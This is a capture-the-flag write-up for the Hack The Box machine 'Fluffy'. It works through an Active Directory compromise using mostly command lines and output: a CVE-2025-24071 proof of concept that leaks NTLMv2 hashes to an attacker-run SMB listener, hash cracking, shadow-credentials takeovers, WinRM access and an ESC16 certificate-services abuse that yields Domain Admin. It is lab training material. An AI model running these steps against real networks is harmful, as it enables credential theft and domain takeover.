HTB - Fluffy

Description
This machine follows an assumed breach scenario, starting with a user who has Read/Write
access to an SMB share. Leveraging a recent Windows vulnerability, the attacker uploads a crafted .zip
file containing a .library-ms
file pointing to a malicious address. When any user extracts the archive, the system initiates an NTLMv2 authentication attempt to the attacker-controlled listener. Capturing the hash via smbserver
or responder
, the attacker cracks it to obtain credentials for another domain user. This user has GenericAll
over a group, and the group has GenericWrite
over three domain users, allowing takeover through a shadow credentials attack. One compromised user has WinRM access to the target system, and another is a member of the Cert Publishers
group. By enumerating certificate templates, the attacker identifies and exploits an ESC16 misconfiguration to escalate privileges and obtain Domain Admin access.
Enumeration
As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account:
j.fleischman
/J0elTHEM4n1990!
Nmap Scan
I will start with normal Nmap
scan, but first export the machine IP, Username, Password, and domain to variables for easy usage.
export target=10.10.11.69 ; export user=j.fleischman; export password='J0elTHEM4n1990!'; export domain=fluffy.htb
Nmap Scan
mkdir Nmap; nmap -p- --min-rate 10000 $target -Pn -oN Nmap/allports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49689/tcp open unknown
49690/tcp open unknown
49693/tcp open unknown
49709/tcp open unknown
49716/tcp open unknown
Then, put open ports into ports
variable and run Nmap
script and version scan
export ports="$(cat Nmap/allports | grep '^[0-9]' | cut -d/ -f1 | tr "\n" "," | sed 's/,$//g')"
nmap -p"$ports" $target -Pn -sC -sV -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-10 17:11:16Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m58s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Summary
* Open ports: 53,88,139,389,445,464,593,636,3268,3269,5985,9389
* Services: DNS, KERBEROS, LDAP, LDAPS, SMB, RPC, winRM
* Important notes: Domain: fluffy.htb - DNS:DC01.fluffy.htb
I always update /etc/hosts
before I attack the domain to avoid any tooling issues.
echo "$target dc01 dc01.fluffy.htb fluffy.htb" | sudo tee -a /etc/hosts
10.10.11.69 dc01 dc01.fluffy.htb fluffy.htb
I started by enumerating SMB, looking for accessible shares, and I found that I had READ/WRITE
permission on IT
share
nxc smb $target -u $user -p $password --shares

I connected to the share and found a weird thing. There are archive files, and the corresponding archived data were extracted in the same place.
impacket-smbclient "$domain/$user:$password"@"$target"

There was also .pdf
file which I downloaded and opened locally:

The PDF showed that several vulnerabilities affect the Windows system and need urgent updates to patch these vulnerabilities.
On the same PDF, there is a table with CVE ID and severity of the vulnerabilities

Foothold
CVE-2025-24071
is a recent windows vulnerability that allows stealing hashes using after unzipping archive files inside windows environment.
Windows Explorer automatically initiates an SMB authentication request when a
.library-ms
file is extracted from a.rar
archive, leading to NTLM hash disclosure. The user does not need to open or execute the file—simply extracting it is enough to trigger the leak.
I cloned the repo, ran the exploit, and uploaded the exploit file (.zip
).
git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
➜ CVE-2025-24071_PoC git:(main) python poc.py
Enter your file name: exploit.zip
Enter IP (EX: 192.168.1.162): 10.10.16.14
completed
ls
exploit.zip poc.py README.md
On another terminal, I opened smbserver
to receive the NTLMV2 authentication
impacket-smbserver -smb2support shared $(pwd)

The hash was cracked successfully
hashcat -m 5600 ntlmv2.hash /usr/share/wordlists/rockyou.txt
..snip..
P.AGILA::FLUFFY:aaaaaaaaaaaaaaaa:f29a0e18c93061c0af46ef5bb70b63e5:010100000000000000dd6793ebccdb013c7a2d2bd065bee600000000010010006c004f00620071004b00700056005100030010006c004f00620071004b00700056005100020010004a0061006300470061004b0050006800040010004a0061006300470061004b00500068000700080000dd6793ebccdb0106000400020000000800300030000000000000000100000000200000cbc3277eb791f42542be92295c13824afb1ef0001e7901d4f727bc0b8bbb43b60a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e003100360xxxxxxxxxxxxxxxxxxxxxxxxxxxxx:REDACTED
Session..........: hashcat
Status...........: Cracked
With p.agila
cred or j.fleischman
, I could collect LDAP data with bloodhound.py
bloodhound-python -u $user -p $password -ns $target -d $domain -c all --dns-timeout 120 --zip

Lateral movement
BloodHound
showed the escalation path fromp.agila
to 3 domain users:ca_svc
is a member ofCert Publishers
ldap_svc
winrm_svc
canwinRM
to the box

With
GenericAll
onService Accounts
, I can add any user to that group, inheriting its privilegesWith
GenericWrite
, I could perform the following attacks:targetedkerberoast (Assign SPN to a user and obtain a hash to crack it offline)
Shadow Credential (Add Key Credentials for a user)
I prefer to perform
Shadow Credential
attack because it followsOPSEC
consideration
Add myself to Service Accounts
group
loodyAD --host 10.10.11.69 -d fluffy.htb -u p.agila -p REDACTED add groupMember 'Service Accounts' p.agila
[+] p.agila added to Service Accounts
Add shadow cred for winrm_svc
certipy shadow auto -u p.agila@fluffy.htb -p REDACTED -account winrm_svc

evil-winrm -i fluffy.htb -u winrm_svc -H 33bd09dcd697600edfxxxxxxxxxxx

User flag: 2eb60ea1cc7b27axxxxxxxxxxxxxxx
Privilege Escalation
There was another account in Cert Publishers
group and BloodHound
described its privileges

First, I looked for ADCS in the domain with nxc
and found one with the name offluffy-DC01-CA
nxc ldap fluffy.htb -u p.agila -p REDACTED' -M adcs
LDAP 10.10.11.69 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
LDAP 10.10.11.69 389 DC01 [+] fluffy.htb\p.agila:########
ADCS 10.10.11.69 389 DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.69 389 DC01 Found PKI Enrollment Server: DC01.fluffy.htb
ADCS 10.10.11.69 389 DC01 Found CN: fluffy-DC01-CA
Second, I added a key credential to ca_svc
and got his hash
ertipy shadow auto -u p.agila@fluffy.htb -p REDCATED -account ca_svc

Then, I used the latest version of certipy
to find vulnerable templates to ESC attacks
certipy find -u ca_svc@fluffy.htb -hashes REDACTED -enable -stdout -vulnerable

ESC16 describes a misconfiguration where the CA itself is globally configured to disable the inclusion of the
szOID_NTDS_CA_SECURITY_EXT
(OID1.3.6.1.4.1.311.25.2
) security extension in all certificates it issues. This SID extension, introduced with the May 2022 security updates (KB5014754), is vital for "strong certificate mapping", enabling DCs to reliably map a certificate to a user or computer account's SID for authentication.
I used Certipy Wiki to perform an ESC16 attack:
This is the case in my situation here:

Change the victim account's UPN to match a target privileged account's
sAMAccountName
.
certipy account -u ca_svc -hashes RECATED -dc-ip 10.10.11.69 -upn 'administrator' -user 'ca_svc' update
Request kerberos ticket to authenticate with instead of NTLM authentication to have the updated UPN in the ticket information
impacket-getTGT fluffy.htb/ca_svc -hashes RECATED -dc-ip 10.10.11.69
export KRB5CCNAME=`pwd`/ca_svc.ccache
Request a certificate (which will automatically lack the SID security extension due to the CA's ESC16 configuration).
certipy req -k -dc-ip 10.10.11.69 -target dc01.fluffy.htb -ca 'fluffy-DC01-CA' -template 'User'

Revert the UPN change.
certipy account -u ca_svc -hashes RECATED -dc-ip 10.10.11.69 -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Use the certificate to impersonate the target.
certipy auth -dc-ip 10.10.11.69 -pfx 'administrator.pfx' -username 'administrator' -domain fluffy.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

Get the root flag
nxc smb fluffy.htb -u Administrator -H REDACTED -x 'type C:\Users\Administrator\Desktop\root.txt'

Last updated